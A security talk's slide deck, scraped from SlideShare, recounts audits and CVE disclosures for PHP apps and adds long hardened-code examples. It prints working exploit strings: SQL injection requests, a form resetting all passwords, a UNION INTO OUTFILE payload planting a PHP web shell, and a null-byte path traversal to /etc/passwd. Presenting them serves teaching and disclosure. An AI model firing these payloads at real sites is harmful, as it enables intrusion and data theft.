It's Vulnerable… Now What? Three Diverse Tales of Woe and Remediation
Mark Stanislav <mark.stanislav@gmail.com>
De-Facto Quote Slide
“Thank goodness the working exploit will remain as the ‘gold standard’ for cutting through the BS in the field of data security for the foreseeable future.” - Marsh Ray
Source: http://seclists.org/fulldisclosure/2011/Jan/397 ; it’s legit
The More Hats The Better
Day Job: Linux systems administrator
Night Job: Adjunct lecturer at a university
Boredom: Finding web app vulnerabilities
Side Note: PHP programmer for ~10 years*
* Quickly becoming a Ruby fiend
PHP Vulnerability Primer
Inputs That Get Owned:
  $_GET: Query Strings
    index.php?user=mstanislav
  $_POST: Form Submission
    <input type="text" name="user">
  $_COOKIE: Cookies
    Chocolate Chip -- nom nom.
PHP Vulnerability Primer, cont.
Common Attacks:
  Local File Inclusion (LFI)
    Show me your /etc/passwd file
  SQL Injection
    Show me your user table
  Authentication/Authorization Bypass
    Who needs a username or password?
Tale #1 - On The Clock
Scenario: A client hires a PHP developer to create a web site for their financial service company (Forex)
Problem: Developer has no business writing a ‘Hello, World!’ application, let alone a web application handling credit card data
Vulnerabilities Found
Adjust ‘membership level’ of any account
Reset account passwords to hardcoded default
Change any user password to a desired value
Delete all user accounts
Retrieve ACH account information
Retrieve all user account details
Create an administrative user account
Clown Shoes
“Something or someone that is a total joke”
Source: Urban Dictionary; it’s legit
Code Review, Part #1
Vulnerable Code
  function updateMembershipLevel() {
      list($level,$email) = GetVars(level,email);
      DB_query("UPDATE users SET membership_level = $level WHERE email = $email");
  }
Exploit
  foo.php?mod=user&req=updatelevel&level=100&email=user@example.com
Why The Code Sucks
  • No authentication prior to allowing execution of updateMembershipLevel()
  • There is no audit trail to changes being made through this function
  • The code does not escape or sanitize $_GET variables being passed
Code Review, Part #2
Vulnerable Code
  function updatePassword() {
      list($resetkey,$pass) = PostVars(resetkey,pass1);
      $html = ReadTemplate(password,password_email_form);
      $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey";
      DB_query($sql);
      [...]
  }
Exploit
  <form name="attacker" action="foo.php?mod=password&req=update" method="post">
      <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" />
      <input type="text" name="pass1" value="test" />
  </form>
Why The Code Sucks
  • Only the password input is escaped properly; the ‘resetkey’ $_POST input is not
  • SQL doesn’t use parameterized statements to protect against general SQL injection
Code Review, Part #3
Vulnerable Code
  function insertUser() {
      if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id]))) {
          $clientID = $_SESSION[virtual_client_id];
      } else {
          $clientID = $_SESSION[client_id];
      }
      list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =
          GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);
      [...]
  }
Exploit
  foo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1
Why The Code Sucks
  • insertUser() method isn’t restricted from being available to unauthenticated site visitors
  • is_SuperUser() doesn’t affect arbitrary calls to add a user to the database
  • No sanitization or verification is done to any data based on $_GET variables passed
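What the three reviewed functions look like once the missing controls are in place, as an added example that is not the audited application's code: a login check and an admin-role check before anything privileged runs, PDO prepared statements in place of the slides' GetVars()/PostVars()/DB_query() helpers, password_hash() instead of md5(), a single-use and expiring reset key, and an audit row for every change. The $pdo connection, the users and audit_log columns, and the $_SESSION keys are assumptions made for this example.

```php
<?php
// Added example, not the reviewed application's code: hardened versions of
// the three functions from Code Review Parts #1-#3. The slides' GetVars(),
// PostVars() and DB_query() helpers are replaced by PDO prepared statements.
// $pdo, the users/audit_log columns and the session keys are assumptions.
declare(strict_types=1);

session_start();

/** Refuse the request unless someone is logged in; return their user id. */
function requireLogin(): int {
    if (empty($_SESSION['user_id'])) {
        http_response_code(401);
        exit('authentication required');
    }
    return (int) $_SESSION['user_id'];
}

/** Refuse the request unless the logged-in user holds the admin role. */
function requireAdmin(): int {
    $uid = requireLogin();
    if (($_SESSION['role'] ?? '') !== 'admin') {
        http_response_code(403);
        exit('admin privileges required');
    }
    return $uid;
}

/** Every privileged change is written to an audit table together with the actor. */
function audit(PDO $pdo, int $actor, string $action, string $detail): void {
    $stmt = $pdo->prepare(
        'INSERT INTO audit_log (actor_id, action, detail, at) VALUES (:a, :act, :d, NOW())');
    $stmt->execute([':a' => $actor, ':act' => $action, ':d' => $detail]);
}

/** Part #1: admin-only, inputs validated, values bound, change audited. */
function updateMembershipLevel(PDO $pdo): void {
    $actor = requireAdmin();
    $level = filter_input(INPUT_POST, 'level', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 100]]);
    $email = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);
    if (!is_int($level) || !is_string($email)) {
        http_response_code(400);
        exit('invalid level or email');
    }
    $stmt = $pdo->prepare('UPDATE users SET membership_level = :level WHERE email = :email');
    $stmt->execute([':level' => $level, ':email' => $email]);
    audit($pdo, $actor, 'update_membership_level', "$email -> $level");
}

/** Part #2: the reset key is bound, must match exactly one unexpired row, and is consumed. */
function updatePassword(PDO $pdo): void {
    $resetkey = $_POST['resetkey'] ?? '';
    $pass     = $_POST['pass1'] ?? '';
    if (!is_string($resetkey) || !preg_match('/^[A-Za-z0-9]{32,64}$/', $resetkey)
        || !is_string($pass) || strlen($pass) < 12) {
        http_response_code(400);
        exit('invalid reset key or password');
    }
    $hash = password_hash($pass, PASSWORD_DEFAULT);   // salted bcrypt, not md5()
    $stmt = $pdo->prepare(
        'UPDATE users SET passwd = :hash, resetkey = NULL
          WHERE resetkey = :key AND resetkey_expires > NOW()');
    $stmt->execute([':hash' => $hash, ':key' => $resetkey]);
    if ($stmt->rowCount() !== 1) {
        http_response_code(400);
        exit('reset key is unknown or expired');
    }
}

/** Part #3: only an admin may create users; the group is validated and the password hashed. */
function insertUser(PDO $pdo): void {
    $actor  = requireAdmin();
    $email  = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);
    $group  = filter_input(INPUT_POST, 'group', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 10]]);
    $passwd = $_POST['passwd'] ?? '';
    if (!is_string($email) || !is_int($group) || !is_string($passwd) || strlen($passwd) < 12) {
        http_response_code(400);
        exit('invalid user data');
    }
    $clientID = (int) ($_SESSION['virtual_client_id'] ?? $_SESSION['client_id'] ?? 0);
    $stmt = $pdo->prepare(
        'INSERT INTO users (client_id, email, group_id, passwd) VALUES (:c, :e, :g, :h)');
    $stmt->execute([':c' => $clientID, ':e' => $email, ':g' => $group,
                    ':h' => password_hash($passwd, PASSWORD_DEFAULT)]);
    audit($pdo, $actor, 'insert_user', "$email (group $group)");
}
```

All three functions read their inputs from $_POST rather than $_GET because they change state; the CSRF token check that belongs in front of such handlers is not shown here. The point of rowCount() !== 1 in updatePassword() is that an injected or wildcard key can no longer rewrite every account: the key is a bound string, so the WHERE clause matches at most the one row that owns it.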
Remediation
Created an executive summary of the vulnerabilities, their associated impacts, and recommendations to resolve the issues.
The developer was fired and a new one was hired who fixed the issues, which I verified.
Fun Fact: The developer who wrote this code uses the same code-base for 30+ sites currently online using the same framework...
What’s a CVE?
Common Vulnerabilities & Exposures
“A CVE Identifier will give you a standardized identifier for any given vulnerability or exposure.” - MITRE CVE FAQ
Only for packaged software offerings
Ideally used in a ‘responsible disclosure’ process
Keeps issues organized and easy to reference
Helps to prevent duplication of vulnerabilities
How Do I Get a CVE?
1. Find the vulnerability -- score!
2. Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.
3. Contact a CVE Numbering Authority (CNA)
4. Ideally the vendor cares and fixes the issue
5. Release your advisory with the CVE included
6. Provide links of publication back to MITRE
Tale #2 - The Community
Scenario: Random PHP applications you find on SourceForge.net & FreshMeat.net
Problem: Not everyone releasing free (as in GNU) or paid (as in $$$) software is a good programmer -- surprise!
WSN Links SQL Injection
Vulnerable Code
  Didn’t copy it down, but basically: ‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injection when unified to bridge existing SQL queries to allow for exploitation
Exploit
  search.php?namecondition=IS NULL)) UNION ((SELECT "<?php system($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
Why The Code Sucks
  • Improper sanitization of $_GET inputs within some functions of search
  • No explicit installation recommendation to prevent FILE privilege
  • Side Note: foo.php?debug=1 turns on debugging in the default installation
WSN Links Remediation
CVE-2010-4006
Vendor blacklisted ‘UNION’ within search queries as a ‘fix’ to the issue
New version released 3 days after notification had occurred
It would be better to actually fix all of the SQL injection bugs (yes, there are more) rather than using a bandage like a UNION blacklist
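The alternative to a keyword blacklist, shown here as an added example rather than WSN Links' own code: the client may only pick a condition by name from a server-side allowlist, the server supplies the SQL fragment for it, and the search text is always a bound parameter, so no request value is ever spliced into the query. The links table, its name and url columns, the condition names and the $pdo connection are assumptions for this example; it needs PHP 8 for match.

```php
<?php
// Added example, not WSN Links' code: a search filter that accepts the same
// 'namecondition' and 'namesearch' parameters but never splices either into
// SQL. Table/column names (links: id, name, url) and $pdo are assumptions.
declare(strict_types=1);

// Allowlist: the client names a condition, the server owns the SQL for it.
const NAME_CONDITIONS = [
    'equals'     => 'name = :needle',
    'contains'   => 'name LIKE :needle',
    'startswith' => 'name LIKE :needle',
    'isnull'     => 'name IS NULL',
];

/**
 * Build a WHERE fragment plus its bound parameters from request input.
 * Returns null for any condition outside the allowlist; the caller answers
 * 400 instead of trying to "fix up" the query.
 */
function buildNameFilter(string $condition, string $search): ?array {
    if (!array_key_exists($condition, NAME_CONDITIONS)) {
        return null;
    }
    $params = [];
    if ($condition !== 'isnull') {
        // Escape LIKE metacharacters so the caller cannot widen the match.
        $escaped = addcslashes($search, '%_\\');
        $params[':needle'] = match ($condition) {
            'contains'   => "%{$escaped}%",
            'startswith' => "{$escaped}%",
            default      => $search,
        };
    }
    return ['sql' => NAME_CONDITIONS[$condition], 'params' => $params];
}

/** Run the search; the only SQL text comes from NAME_CONDITIONS. */
function searchLinks(PDO $pdo, string $condition, string $search): array {
    $filter = buildNameFilter($condition, $search);
    if ($filter === null) {
        http_response_code(400);
        return [];
    }
    $stmt = $pdo->prepare(
        'SELECT id, name, url FROM links WHERE ' . $filter['sql'] . ' ORDER BY name LIMIT 100');
    $stmt->execute($filter['params']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Installation-side control the slide asks for: the application's database
// account should not hold FILE (account name is a placeholder):
//   REVOKE FILE ON *.* FROM 'wsnapp'@'localhost';

$condition = $_GET['namecondition'] ?? 'contains';
$search    = $_GET['namesearch'] ?? '';
$rows = (is_string($condition) && is_string($search))
    ? searchLinks($pdo, $condition, $search)
    : [];
```

Because the condition key is looked up with array_key_exists() and the search text is bound, adding or removing keywords from a denylist never enters into it; a new operator is added by extending NAME_CONDITIONS, not by parsing user-supplied SQL.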
Pointter CMS Authentication Bypass
Vulnerable Code
  On all administrative pages:
  if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) {
      header("location:index.php");
  }
Exploit
  Simply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’t impact the exploitation as there is no verification of contents before ‘using’ the cookies as a valid authentication mechanism.
Why The Code Sucks
  • There’s no reason to store a password cookie in the first place
  • A session cookie should be unique and encrypted
  • Blank cookies should never be used as a form of authentication
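How the admin gate should work instead, as an added example that is not Pointter's code: the browser holds nothing but an opaque session id, the server stores who is logged in after checking a password hash, and every administrative page asks the session rather than testing whether two cookies happen to exist. The admins table, its column names and the one-hour session lifetime are assumptions for this example.

```php
<?php
// Added example, not Pointter's code: replaces "are the auser/apass cookies
// set?" with a server-side session created only after password_verify()
// succeeds. $pdo, the admins table and its columns are assumptions.
declare(strict_types=1);

session_set_cookie_params([
    'httponly' => true,   // not readable by page scripts
    'secure'   => true,   // only sent over HTTPS
    'samesite' => 'Lax',
]);
session_start();

/** Check credentials against the stored hash; on success establish the admin session. */
function adminLogin(PDO $pdo, string $user, string $pass): bool {
    $stmt = $pdo->prepare('SELECT id, passwd_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Verify against a throwaway hash when the user is unknown, so the
    // response time does not reveal which usernames exist.
    $hash = $row['passwd_hash']
        ?? password_hash('dummy-' . random_int(0, PHP_INT_MAX), PASSWORD_DEFAULT);
    if ($row === false || !password_verify($pass, $hash)) {
        return false;
    }
    session_regenerate_id(true);              // new id after login: no fixation
    $_SESSION['admin_id']  = (int) $row['id'];
    $_SESSION['logged_in'] = time();
    return true;
}

/** Call at the top of every administrative page; returns the admin's id. */
function requireAdminSession(int $maxAgeSeconds = 3600): int {
    $id = $_SESSION['admin_id'] ?? null;
    $at = $_SESSION['logged_in'] ?? 0;
    if (!is_int($id) || $id <= 0 || !is_int($at) || time() - $at > $maxAgeSeconds) {
        $_SESSION = [];
        session_destroy();
        header('Location: index.php');
        exit;
    }
    return $id;
}

/** Log out: drop the server-side state, not just the cookie. */
function adminLogout(): void {
    $_SESSION = [];
    session_destroy();
}
```

The slide's point that "a session cookie should be unique and encrypted" is met by the session id being a random token that identifies server-side state; nothing about the password, or whether the visitor is an admin, lives in the cookie, so there is nothing for a visitor to set by hand. The vendor's suggested mitigation of renaming the admin folder does not change any of this, since the gate on each page is the only thing the request actually has to pass.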
Pointter CMS Remediation
CVE-2010-4332 & CVE-2010-4333
  Two separate products, same vulnerability
No updates have been released to fix the issue
Disclosure to vendor was met with legal threats and very funny dialog (you’ll see...)
Vendor claims that the user should rename their admin folder to hide, erm... prevent the issue! =)
The Swiss
“Not as docile as you’d expect...”
Source: Me; it’s legit
E-Mail Outtakes!
“We do not understand why you try to manipulate the softwares. I am sure that you are aware that it is illegal to do so.”
“...it is not your duty to publish anything related about our softwares as long as we ask for it.”
“What you are trying to do, is to find a security hole and publish it so that everyone can hack a system. This is the illegal part so be aware of this.”
E-Mail Outtakes!, cont.
“The illegal thing is to publish a security gap to show other people the way how to attack. That is the same as telling someone how to build a bomb.”
“Of course, it could be made safer and we know how to do it. But we have designed the softwares so that renaming admin folder gives us less work.”
Null-Byte Attack Primer
PHP uses C functions for filesystem calls, which read a null-byte as ‘end of string’
  include("/var/www/" . $_GET['file'] . ".php");
  index.php?file=../../../etc/passwd
    include("/var/www/../../../etc/passwd.php");
  index.php?file=../../../etc/passwd%00
    include("/var/www/../../../etc/passwd");
Pulse CMS Local File Inclusion
Vulnerable Code
  $page = $_REQUEST[p];
  switch ($page) {
    case $page:
      include("includes/". $page .".php");
      break;
  }
Exploit
  index.php?p=/../../../../../../../../../../../../../../etc/passwd%00
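A page loader that closes both the traversal and the null-byte truncation described in the primer and in the Pulse CMS code above, as an added example and not Pulse CMS's own fix: the request value is only ever compared against a fixed list of page names (which by construction contains no "..", "/" or NUL), and as a second, independent check the resolved path must lie under the includes directory. The page names and the includes/ location are assumptions for this example.

```php
<?php
// Added example, not Pulse CMS's code: reads the same 'p' request parameter
// but includes only a file from a fixed allowlist under includes/. The page
// names and the directory layout are assumptions.
declare(strict_types=1);

const PAGES = ['home', 'about', 'contact', 'blog'];   // assumed page names
const INCLUDE_DIR = __DIR__ . '/includes';

/**
 * Return the absolute path to include for $page, or null to refuse.
 * Check 1: the name must be on the allowlist, which rules out "..", "/"
 *          and "\0" without trying to filter them out of free-form input.
 * Check 2: the resolved path must still be inside INCLUDE_DIR, so a
 *          mistake in the allowlist cannot reach outside it.
 */
function resolvePage(string $page): ?string {
    if (!in_array($page, PAGES, true)) {
        return null;
    }
    $real = realpath(INCLUDE_DIR . '/' . $page . '.php');
    $base = realpath(INCLUDE_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$page = $_REQUEST['p'] ?? 'home';
$path = is_string($page) ? resolvePage($page) : null;
if ($path === null) {
    http_response_code(404);
    exit('no such page');
}
include $path;
```

Two things worth knowing when reviewing code like the original: the switch/case construct compares $page against itself, so it never restricts anything; and since PHP 5.3.4 the filesystem functions, include() among them, refuse a path that contains a NUL byte, so the %00 truncation from the primer no longer works on a current interpreter. The traversal itself, with the .php suffix left in place, is unaffected by that change, which is why the allowlist, not the null-byte behaviour, is the actual fix.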
Pulse CMS Remediation
CVE-2010-4330
Vendor patched the current version immediately and then released a few version a few days...
Tale #3 - SaaS Gone Wrong
Scenario: You sign-up for a gym membership
Problem: Your gym’s online fitness integration web site h...
SSO “Bypass”
Vulnerable Code
  Have no access to company’s site code, but here’s my best guess...
  checkAuthentication($memberid...
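The slide's guess is that the hand-off between the gym and the fitness site was authenticated by the memberid alone. What a single sign-on hand-off needs instead is an assertion the receiving site can verify and that cannot be produced by anyone who merely knows (or guesses) a member id. The added example below is not the company's code, which the deck says was never seen: the gym's membership system issues an HMAC-signed, expiring token after it has logged the member in, and the integration site's checkAuthentication() accepts a member id only from a token whose signature verifies in constant time and whose expiry has not passed. The shared secret, the claim names and the five-minute lifetime are assumptions.

```php
<?php
// Added example, not the gym company's code: the SSO hand-off carries a
// signed, expiring assertion instead of a bare memberid. The shared secret,
// claim names and lifetime are assumptions for this example.
declare(strict_types=1);

const SSO_LIFETIME = 300;   // seconds a hand-off token stays valid

/** Issued by the membership system after it has authenticated the member. */
function issueSsoToken(string $secret, int $memberId, int $now): string {
    $payload = json_encode([
        'memberid' => $memberId,
        'exp'      => $now + SSO_LIFETIME,
        'nonce'    => bin2hex(random_bytes(8)),   // makes every token distinct
    ]);
    $b64 = strtr(base64_encode($payload), '+/', '-_');   // URL-safe alphabet
    $sig = hash_hmac('sha256', $b64, $secret);
    return $b64 . '.' . $sig;
}

/**
 * Checked by the integration site. Returns the member id only when the
 * signature verifies and the token is unexpired; otherwise null, and the
 * caller must not treat the request as authenticated.
 */
function checkAuthentication(string $secret, string $token, int $now): ?int {
    $parts = explode('.', $token);
    if (count($parts) !== 2) {
        return null;
    }
    [$b64, $sig] = $parts;
    // Verify the MAC before looking at any claim, with a constant-time compare.
    if (!hash_equals(hash_hmac('sha256', $b64, $secret), $sig)) {
        return null;
    }
    $json   = base64_decode(strtr($b64, '-_', '+/'), true);
    $claims = $json === false ? null : json_decode($json, true);
    if (!is_array($claims) || !isset($claims['memberid'], $claims['exp'])) {
        return null;
    }
    if (!is_int($claims['memberid']) || !is_int($claims['exp']) || $claims['exp'] < $now) {
        return null;
    }
    return $claims['memberid'];
}

/** Constructed self-check: valid token passes, expired and wrong-key tokens do not. */
function selfTest(): bool {
    $secret = 'example-secret-not-for-production';
    $now    = time();
    $token  = issueSsoToken($secret, 1234, $now);
    $valid   = checkAuthentication($secret, $token, $now) === 1234;
    $expired = checkAuthentication($secret, $token, $now + SSO_LIFETIME + 1) === null;
    $wrongKey = checkAuthentication($secret, issueSsoToken('other-secret', 1234, $now), $now) === null;
    return $valid && $expired && $wrongKey;
}

echo selfTest() ? "self-test passed\n" : "self-test FAILED\n";
```

With this in place a request that carries only a memberid, sequential or otherwise, never reaches the member's profile: without the secret there is no way to produce a token that hash_equals() accepts. Adding a server-side record of used nonces would make each token strictly single-use as well.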
Vulnerability Verification
Script #1: Out of 10,000 sequential memberid values roughly 2,700 accounts existed in either an act...
Information Being Disclosed
Unactivated Account: First Name, Last Name, Date of Birth, Gender, and E-Mail Address
Activated A...
Remediation
Contacted CEO (small company) with a report
Lots of follow-up e-mails with increasing amounts of people (read: la...
Customers Notified
  90,000+
But be careful...
It’s a very thin line between committing a crime and just trying to help a web site with a problem
Don’t ma...
Generalized Take-Aways
Do the right thing, consistently, and people won’t have much room to actually threaten you
Full-disclo...
My Thoughts...
Info Sec. is everyone’s responsibility
Don’t accept an answer of “well, we didn’t build this with security in ...
Thanks...
Jon Oberheide - Duo Security
Steve Christy - MITRE
Todd Jarvis - Packet Storm Security
Contact
E-Mail: mark.stanislav@gmail.com
Twitter: @markstanislav
Website: http://www.uncompiled.com
Upcoming SlideShare
Loading in...5
×

It’s Vulnerable… Now What?: Three Tales of Woe and Remediation

1,871

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,871
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
19
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • It’s Vulnerable… Now What?: Three Tales of Woe and Remediation

    1. 1. Its Vulnerable… Now What? Three Diverse Tales of Woe and RemediationMark Stanislav <mark.stanislav@gmail.com>
    2. 2. De-Facto Quote Slide“Thank goodness the working exploitwill remain as the ‘gold standard’ forcutting through the BS in the field ofdata security for the foreseeable future.” - Marsh Ray Source: http://seclists.org/fulldisclosure/2011/Jan/397 ; it’s legit
    3. 3. The More Hats The Better
    4. 4. The More Hats The BetterDay Job: Linux systems administrator
    5. 5. The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a university
    6. 6. The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding web app vulnerabilities
    7. 7. The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding web app vulnerabilitiesSide Note: PHP programmer for ~10 years* * Quickly becoming a Ruby fiend
    8. 8. PHP Vulnerability Primer
    9. 9. PHP Vulnerability PrimerInputs That Get Owned:
    10. 10. PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav
    11. 11. PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav $_POST: Form Submission <input type=”text” name=”user”>
    12. 12. PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav $_POST: Form Submission <input type=”text” name=”user”> $_COOKIE: Cookies Chocolate Chip -- nom nom.
    13. 13. PHP Vulnerability Primer, cont.
    14. 14. PHP Vulnerability Primer, cont.Common Attacks:
    15. 15. PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd file
    16. 16. PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd file SQL Injection Show me your user table
    17. 17. PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd file SQL Injection Show me your user table Authentication/Authorization Bypass Who needs a username or password?
    18. 18. Tale #1 - On The Clock
    19. 19. Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirfinancial service company (Forex)
    20. 20. Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirfinancial service company (Forex)Problem: Developer has no businesswriting a ‘Hello, World!’ application, letalone a web application handling creditcard data
    21. 21. Vulnerabilities Found
    22. 22. Vulnerabilities FoundAdjust ‘membership level’ of any account
    23. 23. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded default
    24. 24. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired value
    25. 25. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accounts
    26. 26. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account information
    27. 27. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account informationRetrieve all user account details
    28. 28. Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account informationRetrieve all user account detailsCreate an administrative user account
    29. 29. Clown Shoes“Something or someone that is a total joke” Source: Urban Dictionary; it’s legit
    30. 30. Code Review, Part #1
    31. 31. Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email");}
    32. 32. Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email");}Exploitfoo.php?mod=user&req=updatelevel&level=100&email=user@example.com
    33. 33. Code Review, Part #1Vulnerable Code function updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email"); }Exploitfoo.php?mod=user&req=updatelevel&level=100&email=user@example.comWhy The Code Sucks•No authentication prior to allowing execution of updateMembershipLevel()•There is no audit trail to changes being made through this function•The code does not escape or sanitize $_GET variables being passed
    34. 34. Code Review, Part #2
    35. 35. Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}
    36. 36. Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}Exploit<form name="attacker" action="foo.php?mod=password&req=update" method="post"> <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" /> <input type="text" name="pass1" value="test" /></form>
    37. 37. Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}Exploit<form name="attacker" action="foo.php?mod=password&req=update" method="post"> <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" /> <input type="text" name="pass1" value="test" /></form>•Only the password input Sucks properly, the ‘resetkey’ $_POST input is notWhy The Code is escaped•SQL doesn’t use parameterized statements to protect against general SQLinjection
    38. 38. Code Review, Part #3
    39. 39. Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}
    40. 40. Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}Exploitfoo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1
    41. 41. Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}Exploitfoo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1Why The Code Sucks•insertUser() method isn’t restricted from being available to unauthenticated site visitors•is_SuperUser() doesn’t affect arbitrary calls to add a user to the database•No sanitization or verification is done to any data based on $_GET variables passed
    42. 42. Remediation
    43. 43. RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.
    44. 44. RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.The developer was fired and a new one washired who fixed the issues; which I verified.
    45. 45. RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.The developer was fired and a new one washired who fixed the issues; which I verified.Fun Fact: The developer who wrote this codeuses the same code-base for 30+ sites currentlyonline using the same framework...
    46. 46. What’s a CVE?
    47. 47. What’s a CVE?Common Vulnerabilities & Exposures
    48. 48. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQ
    49. 49. What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offerings
